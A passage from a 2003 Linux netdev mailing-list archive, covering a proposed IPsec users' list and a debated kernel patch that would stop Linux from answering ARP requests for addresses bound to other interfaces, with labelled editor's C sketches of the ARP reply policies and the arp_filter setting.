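 * Assumption: offset elements are combined left to right.
 */
static int egp_match_tcp_dport22(const uint8_t *pkt, size_t len)
{
    int proto = egp_u8_at(pkt, len, 9);   /* IP protocol field */
    int vihl  = egp_u8_at(pkt, len, 0);   /* version and IHL byte */
    size_t off;

    if (proto != 6 || vihl < 0)
        return 0;

    /* Dynamic element: (byte 0 & 0xf) is the IHL in 32-bit words.
     * Multiplying by 4 gives the IP header length in bytes; adding 2
     * lands on the TCP destination port. */
    off = (size_t)(vihl & 0xf) * 4 + 2;

    return egp_u16_at(pkt, len, off) == 22;
}
```

Both readers check bounds before touching the packet, so an offset computed from packet contents that points past the end is treated as a non-match instead of being dereferenced.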
Kind Regards -- Thomas GRAF http://tgr.kaosu.ch/ From ahu@outpost.ds9a.nl Sun Jul 27 04:40:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 04:41:04 -0700 (PDT) Received: from outpost.ds9a.nl (postfix@outpost.ds9a.nl [213.244.168.210]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RBeeFl004987 for ; Sun, 27 Jul 2003 04:40:41 -0700 Received: by outpost.ds9a.nl (Postfix, from userid 1000) id 64B99410B; Sun, 27 Jul 2003 13:04:56 +0200 (CEST) Date: Sun, 27 Jul 2003 13:04:56 +0200 From: bert hubert To: jmorris@intercode.com.au, davem@redhat.com, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, lartc@mailman.ds9a.nl, linux-kernel@vger.kernel.org Subject: setting up an IPSEC on Linux mailinglist? Message-ID: <20030727110456.GB6556@outpost.ds9a.nl> Reply-To: ahu@ds9a.nl Mail-Followup-To: bert hubert , jmorris@intercode.com.au, davem@redhat.com, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, lartc@mailman.ds9a.nl, linux-kernel@vger.kernel.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4309 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ahu@ds9a.nl Precedence: bulk X-list: netdev [crossposted, private replies appreciated to prevent massive list pollution, lartc@mailman.ds9a.nl is closed for non-subscribers] I'm pondering setting up a mailinglist for native Linux 2.6 IPSEC users and I'm wondering is such a list exists already and what your feelings are. This list would be a place for end-users to discuss, where problems found could be thrown over the fence to netdev if needed. Interoperability with FreeS/WAN would also be an appropriate subject. This list could also have a webpage listing all available tools, a FAQ, whatever. Thanks. 
-- http://www.PowerDNS.com Open source, database driven DNS Software http://lartc.org Linux Advanced Routing & Traffic Control HOWTO From ahu@outpost.ds9a.nl Sun Jul 27 04:40:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 04:41:05 -0700 (PDT) Received: from outpost.ds9a.nl (postfix@outpost.ds9a.nl [213.244.168.210]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RBedFl004986 for ; Sun, 27 Jul 2003 04:40:40 -0700 Received: by outpost.ds9a.nl (Postfix, from userid 1000) id EEE7644F8; Sun, 27 Jul 2003 13:07:19 +0200 (CEST) Date: Sun, 27 Jul 2003 13:07:19 +0200 From: bert hubert To: "Dr. Peter Bieringer " Cc: Maillist netdev , Maillist USAGI-users Subject: Re: Compatibility problems IPsec 2.5.70 against FreeS/WAN 1.99 Message-ID: <20030727110719.GC6556@outpost.ds9a.nl> Mail-Followup-To: bert hubert , "Dr. Peter Bieringer " , Maillist netdev , Maillist USAGI-users References: <20030604145350.88F0D1387A@smtp2.aerasec.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030604145350.88F0D1387A@smtp2.aerasec.de> User-Agent: Mutt/1.3.28i X-archive-position: 4310 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ahu@ds9a.nl Precedence: bulk X-list: netdev On Wed, Jun 04, 2003 at 04:53:50PM +0200, Dr. Peter Bieringer wrote: > Hi, > > has anyone successful examples of configuration settings for 2.5.70 IPsec > (racoon/SAD/SPD) and FreeS/WAN? I've heard reports that it worked at one stage so if it doesn't now, something must've broken recently. > I got no success between 2 hosts, neither in tunnel nor in transport mode. I'll try to roust some FreeS/WAN fanatics I know to help test. 
Bert -- http://www.PowerDNS.com Open source, database driven DNS Software http://lartc.org Linux Advanced Routing & Traffic Control HOWTO From davem@redhat.com Sun Jul 27 13:28:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 13:28:34 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RKSUFl021669 for ; Sun, 27 Jul 2003 13:28:30 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id NAA25827; Sun, 27 Jul 2003 13:24:46 -0700 Date: Sun, 27 Jul 2003 13:24:45 -0700 From: "David S. Miller" To: ahu@ds9a.nl Cc: jmorris@intercode.com.au, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, lartc@mailman.ds9a.nl, linux-kernel@vger.kernel.org Subject: Re: setting up an IPSEC on Linux mailinglist? Message-Id: <20030727132445.5e0eddab.davem@redhat.com> In-Reply-To: <20030727110456.GB6556@outpost.ds9a.nl> References: <20030727110456.GB6556@outpost.ds9a.nl> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4311 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 27 Jul 2003 13:04:56 +0200 bert hubert wrote: > I'm pondering setting up a mailinglist for native Linux 2.6 IPSEC users and > I'm wondering is such a list exists already and what your feelings are. No need, just use linux-net. 
From bloemsaa@xs4all.nl Sun Jul 27 13:41:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 13:41:27 -0700 (PDT) Received: from smtpzilla1.xs4all.nl (smtpzilla1.xs4all.nl [194.109.127.137]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RKfKFl022552 for ; Sun, 27 Jul 2003 13:41:22 -0700 Received: from vialle.bloemsaat.com (vialle.xs4all.nl [213.84.6.25]) by smtpzilla1.xs4all.nl (8.12.9/8.12.9) with ESMTP id h6RKel8e098361; Sun, 27 Jul 2003 22:40:51 +0200 (CEST) Date: Sun, 27 Jul 2003 22:52:48 +0200 (CEST) From: Bas Bloemsaat X-X-Sender: bloemsaa@vialle.bloemsaat.com To: marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org cc: layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: [2.4 PATCH] bugfix: ARP respond on all devices Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4312 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bloemsaa@xs4all.nl Precedence: bulk X-list: netdev

Yesterday (20030726) I found out that, with two NICs on one ethernet
segment, ARPing for one IP address gave me two answers, one from each
NIC, each with its own MAC address. They each have a separate IP
address. At first I thought the NICs were doing proxy ARP for each
other, but it turned out that this wasn't the case. On closer
examination it turned out that any ARP request to a local IP resulted
in a response, even if the devices were on different subnets or
ethernet segments.

I learned from the kernel sources that any NIC receiving an ARP request
for any local IP address would respond to that request. Among others,
that has the following implications:

- when you have two NICs on the same ethernet segment, only one of them
is used: they both respond to any ARP request. As only the first
response is ever used (fastest router), only the NIC that responds
first receives any traffic.
This NIC may or may not be bound to the destination IP. It may not even be reachable because of iptables-rules. This also defeats a common form of load balancing. - when you have two NICs on seperate ethernet segments, for example on a firewall, it is possible to probe one NIC for the IP address of the other. This can be used to gain information about the inside network of the firewall, which is a (minor) security risk. While this is not really practical because every IP address has to be tried, often the inside is of a limit range (10.x.x.x, 192.168.x.x), which makes it useful. I think this is unwanted behaviour. This patch corrects the situation. It makes every device only respond to ARP requests for IP addresses bound to that device, not all local IP addresses. Proxy ARP still applies as before. The patch was made from 2.4.21. It patches 2.4.22-pre8 cleanly and tests okay on both. Please apply. diff -urN linux-2.4.21.orig/include/linux/inetdevice.h linux-2.4.21-okayclean/include/linux/inetdevice.h --- linux-2.4.21.orig/include/linux/inetdevice.h 2002-08-03 02:39:45.000000000 +0200 +++ linux-2.4.21-okayclean/include/linux/inetdevice.h 2003-07-27 18:51:28.000000000 +0200 @@ -86,6 +86,7 @@ extern u32 inet_select_addr(const struct net_device *dev, u32 dst, int scope); extern struct in_ifaddr *inet_ifa_byprefix(struct in_device *in_dev, u32 prefix, u32 mask); extern void inet_forward_change(void); +extern int inet_addr_local_dev(struct in_device *in_dev, u32 addr); static __inline__ int inet_ifa_match(u32 addr, struct in_ifaddr *ifa) { diff -urN linux-2.4.21.orig/net/ipv4/arp.c linux-2.4.21-okayclean/net/ipv4/arp.c --- linux-2.4.21.orig/net/ipv4/arp.c 2002-11-29 00:53:15.000000000 +0100 +++ linux-2.4.21-okayclean/net/ipv4/arp.c 2003-07-27 21:12:17.000000000 +0200 @@ -66,6 +66,7 @@ * Alexey Kuznetsov: new arp state machine; * now it is in net/core/neighbour.c. * Krzysztof Halasa: Added Frame Relay ARP support. 
+ * Bas Bloemsaat : (20030727) Fixed respond on all devices bug */ #include @@ -766,7 +767,9 @@ rt = (struct rtable*)skb->dst; addr_type = rt->rt_type; - if (addr_type == RTN_LOCAL) { + + /* check if arp is for this device */ + if (inet_addr_local_dev(in_dev,tip)) { n = neigh_event_ns(&arp_tbl, sha, &sip, dev); if (n) { int dont_send = 0; @@ -778,6 +781,8 @@ neigh_release(n); } goto out; + + /* check if we can and have to proxy it */ } else if (IN_DEV_FORWARD(in_dev)) { if ((rt->rt_flags&RTCF_DNAT) || (addr_type == RTN_UNICAST && rt->u.dst.dev != dev && diff -urN linux-2.4.21.orig/net/ipv4/devinet.c linux-2.4.21-okayclean/net/ipv4/devinet.c --- linux-2.4.21.orig/net/ipv4/devinet.c 2003-06-13 16:51:39.000000000 +0200 +++ linux-2.4.21-okayclean/net/ipv4/devinet.c 2003-07-27 18:50:19.000000000 +0200 @@ -199,6 +199,17 @@ return 0; } +int +inet_addr_local_dev(struct in_device *in_dev, u32 addr) +{ + for_ifa(in_dev) { + if (!(addr^ifa->ifa_address)) + return -1; + } endfor_ifa(in_dev); + + return 0; +} + static void inet_del_ifa(struct in_device *in_dev, struct in_ifaddr **ifap, int destroy) { From bloemsaa@xs4all.nl Sun Jul 27 14:00:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 14:00:52 -0700 (PDT) Received: from smtpzilla2.xs4all.nl (smtpzilla2.xs4all.nl [194.109.127.138]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RL0gFl023717 for ; Sun, 27 Jul 2003 14:00:43 -0700 Received: from vialle.bloemsaat.com (vialle.xs4all.nl [213.84.6.25]) by smtpzilla2.xs4all.nl (8.12.9/8.12.9) with ESMTP id h6RL0T0A069189; Sun, 27 Jul 2003 23:00:29 +0200 (CEST) Date: Sun, 27 Jul 2003 23:12:30 +0200 (CEST) From: Bas Bloemsaat X-X-Sender: bloemsaa@vialle.bloemsaat.com To: netdev@oss.sgi.com, linux-net@vger.kernel.org, torvalds@osdl.org cc: linux-kernel@vger.kernel.org, layes@loran.com Subject: [2.6 PATCH] bugfix: ARP respond on all devices Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4313 X-ecartis-version: Ecartis 
v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bloemsaa@xs4all.nl Precedence: bulk X-list: netdev This is the samefix as the 2.4 patch. I do not have a machine on which I can test 2.6, but visual examination of the files suggested the same mechanism. In fact, I was surprised that the 2.4 patch wouldn't patch 2.6 so I made this one. It was made with 2.6.0-test1, and compiles. Can someone confirm that 2.6 has the same bug, and that this patch fixes it? I suspect it has, and suspect this fixes it, but can't test for lack of an available machine. Regards, Bas Bloemsaat diff -urN linux-2.6.0-test1.orig/include/linux/inetdevice.h linux-2.6.0-test1/include/linux/inetdevice.h --- linux-2.6.0-test1.orig/include/linux/inetdevice.h 2003-07-14 05:35:56.000000000 +0200 +++ linux-2.6.0-test1/include/linux/inetdevice.h 2003-07-27 21:33:02.000000000 +0200 @@ -98,6 +98,7 @@ extern u32 inet_select_addr(const struct net_device *dev, u32 dst, int scope); extern struct in_ifaddr *inet_ifa_byprefix(struct in_device *in_dev, u32 prefix, u32 mask); extern void inet_forward_change(void); +extern int inet_addr_local_dev(struct in_device *in_dev, u32 addr); static __inline__ int inet_ifa_match(u32 addr, struct in_ifaddr *ifa) { diff -urN linux-2.6.0-test1.orig/net/ipv4/arp.c linux-2.6.0-test1/net/ipv4/arp.c --- linux-2.6.0-test1.orig/net/ipv4/arp.c 2003-07-14 05:37:28.000000000 +0200 +++ linux-2.6.0-test1/net/ipv4/arp.c 2003-07-27 21:37:31.000000000 +0200 @@ -67,6 +67,7 @@ * now it is in net/core/neighbour.c. * Krzysztof Halasa: Added Frame Relay ARP support. * Arnaldo C. 
Melo : convert /proc/net/arp to seq_file + * Bas Bloemsaat : (20030727) Fixed respond on all devices bug */ #include @@ -750,7 +751,8 @@ rt = (struct rtable*)skb->dst; addr_type = rt->rt_type; - if (addr_type == RTN_LOCAL) { + /* check if arp is for this device */ + if (inet_addr_local_dev(in_dev,tip)) { n = neigh_event_ns(&arp_tbl, sha, &sip, dev); if (n) { int dont_send = 0; @@ -762,6 +764,7 @@ neigh_release(n); } goto out; + /* check if we can and have to proxy it */ } else if (IN_DEV_FORWARD(in_dev)) { if ((rt->rt_flags&RTCF_DNAT) || (addr_type == RTN_UNICAST && rt->u.dst.dev != dev && diff -urN linux-2.6.0-test1.orig/net/ipv4/devinet.c linux-2.6.0-test1/net/ipv4/devinet.c --- linux-2.6.0-test1.orig/net/ipv4/devinet.c 2003-07-14 05:31:57.000000000 +0200 +++ linux-2.6.0-test1/net/ipv4/devinet.c 2003-07-27 21:34:46.000000000 +0200 @@ -219,6 +219,15 @@ return 0; } +int inet_addr_local_dev(struct in_device *in_dev, u32 addr) +{ + for_ifa(in_dev) { + if (!(addr^ifa->ifa_address)) + return -1; + } endfor_ifa(in_dev); + return 0; +} + static void inet_del_ifa(struct in_device *in_dev, struct in_ifaddr **ifap, int destroy) { From davem@redhat.com Sun Jul 27 15:15:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 15:15:49 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RMFhFl028392 for ; Sun, 27 Jul 2003 15:15:43 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id PAA25990; Sun, 27 Jul 2003 15:12:34 -0700 Date: Sun, 27 Jul 2003 15:12:34 -0700 From: "David S. 
Miller" To: Bas Bloemsaat Cc: marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727151234.6e2aa57e.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4314 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 27 Jul 2003 22:52:48 +0200 (CEST) Bas Bloemsaat wrote: > I think this is unwanted behaviour. Not a bug. This behavior is on purpose. Use source based routes if you want to control how ARP responses behave in this way. This is becoming a FAQ. From davem@redhat.com Sun Jul 27 16:37:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 16:37:34 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RNbQFl000718 for ; Sun, 27 Jul 2003 16:37:27 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA26251; Sun, 27 Jul 2003 16:34:22 -0700 Date: Sun, 27 Jul 2003 16:34:22 -0700 From: "David S.
Miller" To: Cedric Gavage Cc: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030727163422.28e44736.davem@redhat.com> In-Reply-To: <3F1E7435.4060308@unixtech.be> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E7435.4060308@unixtech.be> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4315 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 13:40:37 +0200 Cedric Gavage wrote: > Ok, now it's e100 driver, I will wait some hours to see if we have again > problems, thanks for your help. Any problems yet? 
From carlosev@newipnet.com Sun Jul 27 16:41:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 16:41:22 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RNf9Fl001231 for ; Sun, 27 Jul 2003 16:41:13 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id DFE6420948; Mon, 28 Jul 2003 01:41:03 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 46E7B20642; Mon, 28 Jul 2003 01:40:45 +0200 (CEST) Message-ID: <200307280140470646.1078EC67@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 01:40:47 +0200 From: "Carlos Velasco" To: "Bas Bloemsaat" , marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org Cc: layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6RNf9Fl001231 X-archive-position: 4316 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 22:52 Bas Bloemsaat wrote: >I learned from the kernel sources that any NIC receiving an ARP request >for any local IP adress would respond to that request. Among others, that >has the following implications: >- when you have two NICs same ethernet segment, only one of them is used: >they both respond to any ARP request. As only the first response is ever >used (fasted router), only the NIC that responds first receives any >traffic. This NIC may or may not be bound to the destination IP. It may >not even be reachable because of iptables-rules. 
This also defeats a
>common form of load balancing.

I ran into the same problems you have reported here.
There's a feature, called "hidden", that makes Linux behave like other
OSes and systems. However, it's not included in the mainline kernel,
although IMHO IT SHOULD BE.
Here is the patch:
http://www.ssi.bg/~ja/#hidden

Extracted from http://www.linuxvirtualserver.org/docs/arp.html:
===
Linux kernel 2.0.xx doesn't do arp response on loopback alias and
tunneling interfaces, it is good for the LVS cluster. However, Linux
kernel 2.2.xx does all arp responses of all its IP addresses except the
loopback addresses (127.0.0.0/255.0.0.0) and multicast addresses.
===

Of the systems I have tried, Linux is currently the only one with this
behaviour:
Solaris 8 -> does not send ARP reply for another interface.
Cisco -> does not send ARP reply for another interface.
Windows 2000, XP -> does not send ARP reply for another interface.
Linux 2.6.0-pre1, 2.4.20, 2.4.21 -> DOES send ARP reply for another interface.

>- when you have two NICs on separate ethernet segments, for example on a
>firewall, it is possible to probe one NIC for the IP address of the other.
>This can be used to gain information about the inside network of the
>firewall, which is a (minor) security risk. While this is not really
>practical because every IP address has to be tried, often the inside is of
>a limited range (10.x.x.x, 192.168.x.x), which makes it useful.

Yes, a minor security problem arises from this _INTENTIONAL_ behaviour
of Linux networking.
The official approach is to play with routing and netfilter/arpfilter
to work around this _INTENTIONAL_ behaviour and make Linux behave like
other OSes do.
The unofficial approach (not in the mainline kernel, reason unknown) is
to use the "hidden patch". It works through a /proc switch,
/proc/sys/net/ipv4/conf//hidden, so it should not break anything.
However, it is not in the mainline kernel.
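
[Editor's sketch, not part of the original mail.] The two behaviours
being argued about in this thread can be modelled in a few lines of
user-space C. This is a simplified illustration only: it ignores proxy
ARP, routing and the arp_filter sysctl, and the struct and function
names are hypothetical, not kernel APIs. reply_any_local() models what
the thread describes for stock 2.2/2.4 kernels; reply_bound_only()
models what Bas's patch proposes.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical user-space model; names are illustrative, not kernel APIs. */
struct model_if {
    const char *name;
    const uint32_t *addrs;   /* IPv4 addresses bound to this interface */
    size_t naddrs;
};

/* Return 1 if ip is one of the addresses bound to ifp, 0 otherwise. */
static int if_has_addr(const struct model_if *ifp, uint32_t ip)
{
    size_t i;

    for (i = 0; i < ifp->naddrs; i++)
        if (ifp->addrs[i] == ip)
            return 1;
    return 0;
}

/* Behaviour described for stock kernels: answer an ARP request received
 * on interface rx if the target IP is local on ANY interface. */
int reply_any_local(const struct model_if *ifs, size_t nifs,
                    size_t rx, uint32_t tip)
{
    size_t i;

    if (rx >= nifs)
        return 0;
    for (i = 0; i < nifs; i++)
        if (if_has_addr(&ifs[i], tip))
            return 1;
    return 0;
}

/* Behaviour proposed by the patch: answer only if the target IP is
 * bound to the interface the request arrived on. */
int reply_bound_only(const struct model_if *ifs, size_t nifs,
                     size_t rx, uint32_t tip)
{
    if (rx >= nifs)
        return 0;
    return if_has_addr(&ifs[rx], tip);
}
```

For a host with 10.0.0.1 on eth0 and 192.168.0.1 on eth1, a request for
192.168.0.1 arriving on eth0 is answered under the first policy and
ignored under the second, which is exactly the difference in the table
above.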
Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 16:50:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 16:50:06 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RNo1Fl002019 for ; Sun, 27 Jul 2003 16:50:02 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA26314; Sun, 27 Jul 2003 16:46:50 -0700 Date: Sun, 27 Jul 2003 16:46:49 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727164649.517b2b88.davem@redhat.com> In-Reply-To: <200307280140470646.1078EC67@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4317 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 01:40:47 +0200 "Carlos Velasco" wrote: > I stepped into the same problems you have reported here. No, your problem was completely different. > There's a feature to do linux to behave like other OS and systems, called "hidden". WRONG! People please stop this misinformation already. Bas's problem can be solved by him giving a "preferred source" to each of his IPV4 routes and setting the "arpfilter" sysctl variable for his devices to "1". This particular case has been discussed to death in the past and I really recommend people read up there before dragging this out further. 
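
[Editor's sketch, not part of the original mail.] The sysctl half of the
advice above can be applied at runtime without patching the kernel. The
sketch below assumes that the "arpfilter" variable mentioned here is the
per-device entry exposed as /proc/sys/net/ipv4/conf/<dev>/arp_filter;
the function names are hypothetical, and the sysctl root is passed in as
a parameter only so the path logic can be exercised without touching a
live system. The preferred-source half is a routing-table change and is
not shown.

```c
#include <stdio.h>

/* Build the per-device arp_filter path under a sysctl root
 * (normally "/proc/sys"). Assumption: the entry is named arp_filter.
 * Returns 0 on success, -1 if the path does not fit in buf. */
int arp_filter_path(char *buf, size_t len, const char *root, const char *dev)
{
    int n = snprintf(buf, len, "%s/net/ipv4/conf/%s/arp_filter", root, dev);

    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Write "1" (on) or "0" (off) to the device's arp_filter entry.
 * Needs root privileges on a real system.
 * Returns 0 on success, -1 on any error. */
int set_arp_filter(const char *root, const char *dev, int on)
{
    char path[256];
    FILE *f;
    int rc;

    if (arp_filter_path(path, sizeof path, root, dev) != 0)
        return -1;
    f = fopen(path, "w");
    if (!f)
        return -1;
    rc = (fputs(on ? "1\n" : "0\n", f) == EOF) ? -1 : 0;
    if (fclose(f) == EOF)
        rc = -1;
    return rc;
}
```

On a live machine one would call set_arp_filter("/proc/sys", "eth0", 1)
for each device concerned, after giving the relevant routes a preferred
source address as described above.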
From carlosev@newipnet.com Sun Jul 27 16:58:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 16:58:46 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RNwaFl002808 for ; Sun, 27 Jul 2003 16:58:37 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 115E020642; Mon, 28 Jul 2003 01:58:33 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 4EBE22092D; Mon, 28 Jul 2003 01:58:23 +0200 (CEST) Message-ID: <200307280158250677.10891156@192.168.128.16> In-Reply-To: <20030727164649.517b2b88.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 01:58:25 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6RNwaFl002808 X-archive-position: 4318 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 16:46 David S. Miller wrote: >No, your problem was completely different. The setting who show up the problem was different. The problem is the same. >Bas's problem can be solved by him giving a "preferred source" >to each of his IPV4 routes and setting the "arpfilter" sysctl >variable for his devices to "1". Yes, it's another approach to solve his problem. But he must play with routing. 
With the "hidden patch" the only thing he needs is to switch the feature on. Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 17:01:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:01:44 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S01eFl003361 for ; Sun, 27 Jul 2003 17:01:40 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA26370; Sun, 27 Jul 2003 16:58:31 -0700 Date: Sun, 27 Jul 2003 16:58:31 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727165831.05904792.davem@redhat.com> In-Reply-To: <200307280158250677.10891156@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII 